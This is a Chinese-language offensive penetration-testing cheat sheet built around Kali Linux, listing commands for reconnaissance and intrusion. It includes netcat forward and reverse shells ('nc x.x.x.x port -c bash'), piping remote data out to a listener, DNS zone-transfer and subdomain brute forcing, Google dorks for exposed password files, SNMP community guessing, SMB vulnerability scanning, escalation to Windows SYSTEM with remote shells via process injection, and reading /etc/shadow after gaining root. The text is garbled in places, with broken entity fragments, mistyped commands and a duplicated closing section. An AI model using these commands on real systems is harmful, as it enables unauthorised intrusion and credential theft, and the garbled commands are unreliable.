如何通过kali进入网站，获取你需要的信息

nc -nv x.x.x.x port nc作为客户端连接对方服务器 说明 -v 显示详细信息 -n 后面添加ip地址不会进行DNS解析

A:nc -l -p port 监听端port端口 B:nc -nv x.x.x.x port 发送端,x.x.x.x为监听端ip 用途：电子取证、信息收集 示例：我们希望将远程服务端的文件目录发送到本机;并且不显示远程主机上可以使用如下命令: 远程服务器：ls -l | nc -nv x.x.x.x port -q 1 这里-q 1表示发送完成后等待1s时间就退出nc 接收端nc -l -p port > log.txt 监听并将信息保存在log.txt文件中大萨达

传输文件: 从B-->A A: nc -lp port > video.mp4 B: nc -nv x.x.x.x port < video.mp4 -q 1 <符号表示传入数据&#xff0c;>符号表示保存数据 也可以从A-->B A: nc -lp port < video.mp4 -q 1 B: nc -nv x.x.x.x port > video.mp4 传输目录&#xff1a; 原理类似&#xff0c;只不过需要在传输过程对目录打包和解压 A:tar -cvf - /music | nc -l -p port -q 1 B:nc -nv x.x.x.x port | tar -xvf -

nc -nvz x.x.x.x 1-65535 探测所有tcp端口 nc -nvzu x.x.x.x 1-1024 探测udp端口

正向控制A:nc -lp port -c bash A提供bash B:nc x.x.x.x port B使用bash 反向控制： A:nc -lp port A使用bash B:nc x.x.x.x port -c bash B提供bash 思考：在渗透测试中，正向控制一般是会被防火墙拦截的，所以可以尝试反向控制，让服务端连接自己暴露的端口 注意：Windwos平台将bash改成cmd

这里以抓取本机网卡数据包为例。首先打开终端;尝试ping百度 ping www.baidu.com 同时打开wireshark，选则虚拟机网卡eth0，再启动抓包

wireshark默认通过端口来识别协议类型如80端口识别为http如有必要需要手动指定协议类型 数据包协议如下ARP、ICMP、TCP、UDP、DNS、http、ftp TCP数据流ff1a;HTTP、SMTP、POP3、SSL/TLS加密传输ff0c;无法查看内容ff09;

follow tcp stream：查看传输内容 Endpoints:查看每种协议具体的ip、包大小、发送数量。 协议分级查看当前帧下的所有协议流量所占百分比。 分组长度：查看不同大小包所占百分比。小包过多会导致瘫痪ff0c;可能是攻击行为。Conversitionsff1a;查看所有会话之间的通信情况。 专家系统针对连接提供一些建议或提示

使用nslookup查看域名解析过程和对应ip tosang@kali:~/桌面$ nslookup > www.baidu.com Server: 114.114.114.114 Address: 114.114.114.114 Non-authoritative answer: www.baidu.com canonical name = www.a.shifen.com. Name: www.a.shifen.com Address: 61.135.169.125 Name: www.a.shifen.com Address: 61.135.169.121

根据自定义域名服务器查询dig @8.8.8.8 www.sina.com mx 正向查询dig www.sina.com any 反向查询使用ptr反向解析 dig +noall +answer -x 8.8.8.8 其中+noall +answer表示省略无用信息 bind版本信息: dig +noall +answer txt chaos VERSION.BIND @ns3.dnsv4.com 通过查询bind版本信息可以分析是否存在漏掉可以利用 DNS追踪: dig +trace example.com 抓包比较递归查询、迭代查询过程的区别

以下命令可以尝试去连接域名服务器;但一般会被拒绝 dig @ns1.example.com example.com axfr host -T -l sina.com8.8.8.8

fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt fierce自带字典host.txt;可以通过命令 查看 dnsdict6 -d4 -t 16 -x sina.com 默认集成多种字典命中率高执行速度快最常用 dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 sina.com -0 sina.xml dnsmap sina.com -W dns.txt dnsrecon -d sina.com -lifetime 10 -t brt -D dnsbig.txt dnsrecon -t std -d sina.com

说明一般大型互联网企业域名都做了反查询所以会查不到 Whois whois -h whois.apnic.net 192.0.43.10

SHODAN使用前需要到shodan官网注册一个账号并获取自己的API Key 搜索联网的设备 Banner: http、 ftp、 ssh、 telnet https://www.shodanio/ 常见filter: net (192. 168.20.1) city country (CN、US) port (80、 21、22、23) OS Hostname (主机或域名) server 示例：搜索中国地区端的81端口ip port:81 country:CN HTTP/1.1 200

+充值 -支付 +代表含有-代表排除 北京的电子商务公司—— 北京 intitle:电子商务 intext:法人 intext:电话 阿里网站上的北京公司联系人——北京 site:alibaba.com inurl:contact 塞班司法案的PDF文档——SOX filetype:pdf 法国的支付相关页面——payment site:fr 一些常用实例inurt:"level/15/exec/-/show" intille: "netbotz appliance" "ok" inurl /admin/login.php inurt:qq.txt filetype:xls "username| password" inud:ftp "password" filetype:xls site:baidu.com Inurd:Service.pwd http://exploit.db.com/google-dorks

theHarvester 可以使用google、bing等搜索引擎搜索文域名、邮件需要翻墙 Maltego 图形化展示搜索工具kali十大工具之一

exiftool xx.jpg 查看图片Exif图片信息 Foca windows平台软件

常用命令： recon-ng sina 建立名为sina的工作区 keys add baidu_api api 为baidu_api添加api keys remove xxx 移除某个api keys list 查看所有api 安装模块： marketplace refresh  marketplace search hackertarget  marketplace install recon/domains-hosts/hackertarget  使用模块： modules load recon/domains-hosts/hackertarget  info  help  options set SOURCE rapid7.com  run  show hosts

arping 用于在局域网通过目标ip获取mac地址 arping 1.1.1.1 -c 1 arping 1.1.1.1 -d 发现同一ip下重复的mac arping c1 1.1.1.1 | grep "bytes from" | cut d"-f5 | cut d"T"-f2 I cut -d"]"-f 1 脚本 arping l.sh etho > addrs arping 2.sh addrs 场景：通过编写脚本，arping可以发现子网段的所有连接的ip及其mac地址

nmap 1.1.1.1-254 -sn 扫描ping，但是不去扫描端口 namp在扫描的时候会尝试对找到的ip进行反向查询dns获取其域名 nmap -iL iplist.txt sn

Netdiscover专用于二层发现，可用于无线和交换网络环境，主动和被动探测 主动探测： netdiscover -i ethO T 1.1.1 .0/24 netdiscover -1 iplist.txt 被动： （主动arp容易触发报警，伪装成局域网一部分，截取arp数据包分析） netdiscover -P

Scapy 作为Python库进行调用 也可作为单独的工具使用 抓包、分析、创建、修改、注入网络流量 apt-get install python-gnuplot Scapy ARP().display() Sr1() Python脚本 Arpl.py Arp2.py

说明ttl值在linux系统性一般是64每经过一跳路由自动减一 Ping 1.1.1.1 -c 2 -c指定发送几个请求 Ping-R 1.1.1.1 / traceroute 1.1.1.1 ping 1.1.1.1-C 1 | grep "bytes from" | cut -d "" -f4 | cut-d":"-f 1 pmap -sn 1.1.1.1 -255 nmap -iL iplist.txt -sn Hping 能够发送几乎任意TCP/IP包 功能强大但每次只能扫描一个目标 hping3 1.1.1.1 -icmp -C 2 for addr in $(seq 1 254); do hping3 1.1.1.$addr icmp C I >> handle.txt & done

nmap 1.1.1.1-254 -PU53 -sn 使用udp发现 nmap 1.1.1.1-254 -PA80 -sn 使用TCP发现（ack包 ） nmap -iL iplist.txt -PA80 -sn 端口扫描： Nmap nmap -sU 1.1.1.1 默认的1000个参数 ICMP host-unreachable说明端口关闭 没有回应说明可能开启 nmap 1.1.1.1 -sU-p 53 nmap -iL iplist.txt -sU P 1-200

隐蔽扫描即每次不建立完整三次连接只发生syn信息 应用日志不记录扫描行为&#xff0c;较为隐蔽 发送流程为&#xff1a;-->使用scapy发送Syn包给目标主机 <--目标主机回复syn/ack包 -->本机操作系统内核会识别到异常握手发出RST请求 屏蔽内核的RST请求 iptables -A OUTPUT -P tcp --tcp-flags RST RST -d 本地ip -j DROP Scapy命令&#xff1a; sr1(IP(dst="192.168.60.3]/TCP(dport=80),timneout=l,verbose=1) nmap命令& nmap -sS 1.1.1.1 -p 80 21,25.110.443 nmap -sS 1.1.1.1 -P -65535 --open nmap -sS 1.1.1.1 -P --open nmap -sS -iL iplist.txt -P 80 僵尸扫描 极度隐蔽 实施条件苛刻 可伪造源地址 选择僵尸机&#xff1a;闲置系统且系统使用递增的IPID不能全是0 发现僵尸机 nmap -P 80 192.168.1.133 --script=ipidseq.nse 扫描目标nmap 172.16.36.135 -sl 172.16.36.134 Pn p 0- 100

扫描banner： nc -nv x.x.x.x dmitry -p 172. 16.36.135 dmitry -pb 172.16.36.135 nmap -sI 1.1.1.1 -P 22 -script=banner nmap 域名/IP （最强大）

snmp: 信息的金矿 经常被错误配置 public / private / manager MIB Tree: SNMP Management Information Base (MIB) 树形的网络设备管理功能数据库 1.3.6.1.4.1.77.1.2.25 onesixtyone 1.1.1.1 public onesixtyone -C dict.txt -i hosts -o my.log -W 100 可读性强的工具： snmpcheck -t 192. 168.20.199 snmpcheck -t 192. 168.20.199 -C private -V 2 snmpcheck -t 192. 168.20.199 -W

nmap -v -p 139,445 192.168.60.1-20 nmap 192.168.60.4 -p 139,445 --script=smb-os- discovery.nse nmap -v -P 139,445 --script=smb-check-vulns --script-args=unsafe=1 1.1.1.1 nbtscan -r 192. 168.60.0/24 enum4linux -a 192.1 68.60.10

WEB应用防火墙 wafw00f -l wafw00f http://www.microsoft.com nmap www.microsoft.com --script=http-waf-detect.nse

Windows system账号 官方工具： SysInternal suite https://technet.microsoft.com/en-us/sysinternals/bb545027 psexec -i -S d taskmgr xp系统下at 19:39 /interactive cmd 该命令会定时启动一个system权限的cmd;只能在xp系统使用通过服务方式 SC Create syscmd binPath= "cmd /K start" type= own type= interact SC start syscmd 隐蔽注入上面的几种方式会创建单独的进程可能被发现可以使用pinjector进行隐蔽注入注入到某个system权限的进程中然后通过nc可以远程shell

Windows： Wireshark Omnipeek commview Sniffpass Linux Tcpdump Wireshark Dsniff

Linux: /etc/resolv.conf dns配置信息 /etc/passwd 存放用户账户 /etc/shadow 存放用户密码 whoami, who -a ifconfig -a, iptables -L -n, netstat -rn uname -a, ps aux 查看操作系统信息进程信息 dpkg -l | head 查看安装的软件

 #### 抓包嗅探

 #### 基本信息收集 > 当我们获取到某个主机的root权限后我们要尽可能收集其信息 ```shell Linux: /etc/resolv.conf dns配置信息 /etc/passwd 存放用户账户 /etc/shadow 存放用户密码 whoami, who -a ifconfig -a, iptables -L -n, netstat -rn uname -a, ps aux 查看操作系统信息，进程信息 dpkg -l | head 查看安装的软件